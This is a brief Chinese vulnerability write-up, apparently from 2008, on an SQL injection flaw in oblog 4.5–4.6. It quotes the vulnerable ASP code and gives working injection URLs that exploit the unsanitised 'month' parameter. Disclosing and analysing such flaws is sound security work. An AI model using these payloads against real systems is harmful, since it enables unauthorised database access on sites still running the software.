date:2008-5-15 author:yamato[bct] version:oblog 4.5-4.6 sql 代码分析: 文件in/class_usercommand.asp : strmonth=request("month") //第63行 strday=request("day") …… case "month" //第84行 dim lastday g_p_filename = g_p_filename & "month&month=" & strmonth strday=left(strmonth,4) & "-" & right(strmonth,2) & "-01" myear=left(strmonth,4) mmonth=right(strmonth,2) if instr ("01,03,05,07,08,10,12",mmonth)> 0 then lastday = "31"…… else //第109行 sqlpart = " and addtime >=’"&strmonth&"01’ and addtime < ’"&strmonth&lastday&"’ " 构造合适的变量strmonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strday变量从month中获得日期数据,并判断strday是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.open strsql,conn,1,1 不能修改记录集.
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论